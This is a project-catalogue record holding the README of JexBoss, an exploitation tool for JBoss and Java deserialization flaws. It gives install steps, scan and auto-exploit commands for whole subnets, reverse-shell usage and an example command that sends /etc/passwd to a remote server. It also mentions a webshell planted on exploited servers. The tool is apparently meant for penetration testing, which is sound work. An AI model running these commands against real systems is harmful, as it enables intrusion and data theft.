{"id":13816497,"url":"https://github.com/joaomatosf/jexboss","last_synced_at":"2025-05-15T15:32:39.986Z","repository":{"id":23960757,"uuid":"27342951","full_name":"joaomatosf/jexboss","owner":"joaomatosf","description":"JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool","archived":false,"fork":false,"pushed_at":"2020-01-21T13:29:54.000Z","size":4234,"stargazers_count":2422,"open_issues_count":29,"forks_count":638,"subscribers_count":95,"default_branch":"master","last_synced_at":"2024-11-19T13:38:26.878Z","etag":null,"topics":["deserialization","exploit","exploiting-vulnerabilities","gadget","javadeser","reverse-shell"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/joaomatosf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-11-30T16:56:15.000Z","updated_at":"2024-11-18T23:14:32.000Z","dependencies_parsed_at":"2022-07-11T13:37:53.896Z","dependency_job_id":null,"html_url":"https://github.com/joaomatosf/jexboss","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2Fjexboss","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2Fjexboss/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2Fjexboss/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2Fjexboss/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/joaomatosf","download_url":"https://codeload.gith
ub.com/joaomatosf/jexboss/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254367689,"owners_count":22059556,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["deserialization","exploit","exploiting-vulnerabilities","gadget","javadeser","reverse-shell"],"created_at":"2024-08-04T05:00:43.578Z","updated_at":"2025-05-15T15:32:38.691Z","avatar_url":"https://github.com/joaomatosf.png","language":"Python","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"JexBoss - JBoss (and other Java Deserialization Vulnerabilities) verify and EXploitation Tool\n==============================================================================================\n\nJexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and other Java platforms, frameworks, applications, etc.\n\nRequirements\n----\n* Python \u003e= 2.7.x\n* [urllib3](https://pypi.python.org/pypi/urllib3)\n* [ipaddress](https://pypi.python.org/pypi/ipaddress)\n\nInstallation on Linux\\Mac\n-------------------------\nTo install the latest version of JexBoss, please use the following commands:\n\n\tgit clone https://github.com/joaomatosf/jexboss.git\n\tcd jexboss\n\tpip install -r requires.txt\n\tpython jexboss.py -h\n\tpython jexboss.py -host http://target_host:8080\n\n\tOR:\n\n\tDownload the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip\n\tunzip master.zip\n\tcd jexboss-master\n\tpip install -r requires.txt\n\tpython jexboss.py -h\n\tpython jexboss.py -host 
http://target_host:8080\n\n\nIf you are using CentOS with Python 2.6, please install Python 2.7.\nExample installation of Python 2.7 on CentOS using Software Collections (scl):\n\n    yum -y install centos-release-scl\n    yum -y install python27\n    scl enable python27 bash\n\nInstallation on Windows\n-----------------------\nIf you are using Windows, you can use [Git Bash](https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1) to run JexBoss. Follow the steps below:\n\n* Download and install [Python](https://www.python.org/downloads/release/python-2712/)\n* Download and install [Git for Windows](https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1)\n* After installing, run Git for Windows and type the following commands:\n\n```\n    PATH=$PATH:C:\\Python27\\\n    PATH=$PATH:C:\\Python27\\Scripts\n    git clone https://github.com/joaomatosf/jexboss.git\n    cd jexboss\n    pip install -r requires.txt\n    python jexboss.py -h\n    python jexboss.py -host http://target_host:8080\n    \n```\n\nFeatures\n----\nThe tool and exploits were developed and tested for:\n\n* JBoss Application Server versions: 3, 4, 5 and 6.\n* Java Deserialization Vulnerabilities in multiple Java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc.)\n\nThe exploitation vectors are:\n\n* /admin-console\n\t- tested and working in JBoss versions 5 and 6\n* /jmx-console\n\t- tested and working in JBoss versions 4, 5 and 6\n* /web-console/Invoker\n\t- tested and working in JBoss versions 4, 5 and 6\n* /invoker/JMXInvokerServlet\n\t- tested and working in JBoss versions 4, 5 and 6\n* Application Deserialization\n    - tested and working against multiple Java applications, platforms, etc., via HTTP POST parameters\n* Servlet Deserialization\n    - tested and working against multiple Java applications, platforms, etc., via 
servlets that process serialized objects (e.g. when you see an \"Invoker\" in a link)\n* Apache Struts2 CVE-2017-5638\n    - tested in Apache Struts 2 applications\n* Others\n\nVideos\n------\n\n* Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss\n\n[![Alt text](https://img.youtube.com/vi/VaLSYzEWgVE/0.jpg)](https://www.youtube.com/watch?v=VaLSYzEWgVE)\n\n* Exploiting JBoss Application Server with JexBoss\n\n[![Alt text](https://img.youtube.com/vi/yI54sRqFOyI/0.jpg)](https://www.youtube.com/watch?v=yI54sRqFOyI)\n\n* Exploiting Apache Struts2 (RCE) with JexBoss (CVE-2017-5638)\n\n[![Alt text](https://img.youtube.com/vi/PSRsVcfmRSg/0.jpg)](https://www.youtube.com/watch?v=PSRsVcfmRSg)\n\nScreenshots\n----\n\n* Simple usage examples:\n```\n$ python jexboss.py\n```\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/simple_usage_help.png)\n\n* Example of standalone mode against JBoss:\n```\n$ python jexboss.py -u http://192.168.0.26:8080\n```\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/standalone_mode1.png)\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/standalone_mode2.png)\n\n* Usage modes:\n```\n$ python jexboss.py -h\n```\n\n* Network scan mode:\n```\n$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt\n```\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/network_scan_mode.png)\n\n* Network scan with auto-exploit mode:\n```\n$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt\n```\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/scan_with_auto_exploit_mode.png)\n\n* Results and recommendations:\n\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/results_and_recommendations2.png)\n\n\nReverse Shell (meterpreter integration)\n---------------------------------------\nAfter 
you exploit a JBoss server, you can use JexBoss's own command shell or perform a reverse connection using the following command:\n```\n   jexremote=YOUR_IP:YOUR_PORT\n\n   Example:\n     Shell\u003ejexremote=192.168.0.10:4444\n```\n\n* Example:\n![alt tag](https://github.com/joaomatosf/jexboss/raw/master/screenshots/jexbossreverse2.jpg)\n\nWhen exploiting Java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are to open a reverse shell connection or to send a command to execute.\n\n\nUsage examples\n--------------\n\n* For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:\n```\n$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'\n```\n\n* For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):\n```\n$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name\n```\n\n* For Java Deserialization Vulnerabilities in a Servlet (like Invoker):\n```\n$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n```\n\n* For Apache Struts 2 (CVE-2017-5638)\n```\n$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2\n```\n\n* For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources\n```\n$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\"\n```\n\n* Auto scan mode:\n```\n$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log\n```\n\n* File scan mode:\n```\n$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n```\n\n* More Options:\n\n```\noptional arguments:\n  -h, --help            show 
this help message and exit\n  --version             show program's version number and exit\n  --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE\n                        PERMISSION!!!)\n  --disable-check-updates, -D\n                        Disable two updates checks: 1) Check for updates\n                        performed by the webshell in exploited server at\n                        http://webshell.jexboss.net/jsp_version.txt and 2)\n                        check for updates performed by the jexboss client at\n                        http://joaomatosf.com/rnp/releases.txt\n  -mode {standalone,auto-scan,file-scan}\n                        Operation mode (DEFAULT: standalone)\n  --app-unserialize, -j\n                        Check for java unserialization vulnerabilities in HTTP\n                        parameters (eg. javax.faces.ViewState, oldFormData,\n                        etc)\n  --servlet-unserialize, -l\n                        Check for java unserialization vulnerabilities in\n                        Servlets (like Invoker interfaces)\n  --jboss               Check only for JBOSS vectors.\n  --jenkins             Check only for Jenkins CLI vector.\n  --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat\n                        (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be\n                        checked by default.\n  --proxy PROXY, -P PROXY\n                        Use a http proxy to connect to the target URL (eg. 
-P\n                        http://192.168.0.1:3128)\n  --proxy-cred LOGIN:PASS, -L LOGIN:PASS\n                        Proxy authentication credentials (eg -L name:password)\n  --jboss-login LOGIN:PASS, -J LOGIN:PASS\n                        JBoss login and password for exploit admin-console in\n                        JBoss 5 and JBoss 6 (default: admin:admin)\n  --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)\n\nStandalone mode:\n  -host HOST, -u HOST   Host address to be checked (eg. -u\n                        http://192.168.0.10:8080)\n\nAdvanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):\n  --reverse-host RHOST:RPORT, -r RHOST:RPORT\n                        Remote host address and port for reverse shell when\n                        exploiting Java Deserialization Vulnerabilities in\n                        application layer (for now, working only against *nix\n                        systems)(eg. 192.168.0.10:1331)\n  --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d\n                        @/etc/passwd http://your_server)\n  --windows, -w         Specifies that the commands are for rWINDOWS System$\n                        (cmd.exe)\n  --post-parameter PARAMETER, -H PARAMETER\n                        Specify the parameter to find and inject serialized\n                        objects into it. (egs. -H javax.faces.ViewState or -H\n                        oldFormData (\u003c- Hi PayPal =X) or others) (DEFAULT:\n                        javax.faces.ViewState)\n  --show-payload, -t    Print the generated payload.\n  --gadget {commons-collections3.1,commons-collections4.0,groovy1}\n                        Specify the type of Gadget to generate the payload\n                        automatically. 
(DEFAULT: commons-collections3.1 or\n                        groovy1 for JenKins)\n  --load-gadget FILENAME\n                        Provide your own gadget from file (a java serialized\n                        object in RAW mode)\n  --force, -F           Force send java serialized gadgets to URL informed in\n                        -u parameter. This will send the payload in multiple\n                        formats (eg. RAW, GZIPED and BASE64) and with\n                        different Content-Types.\n\nAuto scan mode:\n  -network NETWORK      Network to be checked in CIDR format (eg. 10.0.0.0/8)\n  -ports PORTS          List of ports separated by commas to be checked for\n                        each host (eg. 8080,8443,8888,80,443)\n  -results FILENAME     File name to store the auto scan results\n\nFile scan mode:\n  -file FILENAME_HOSTS  Filename with host list to be scanned (one host per\n                        line)\n  -out FILENAME_RESULTS\n                        File name to store the file scan results\n\n```\n\n\nQuestions, problems, suggestions and etc:\n----\n\n* joaomatosf@gmail.com\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjoaomatosf%2Fjexboss","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjoaomatosf%2Fjexboss","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjoaomatosf%2Fjexboss/lists"}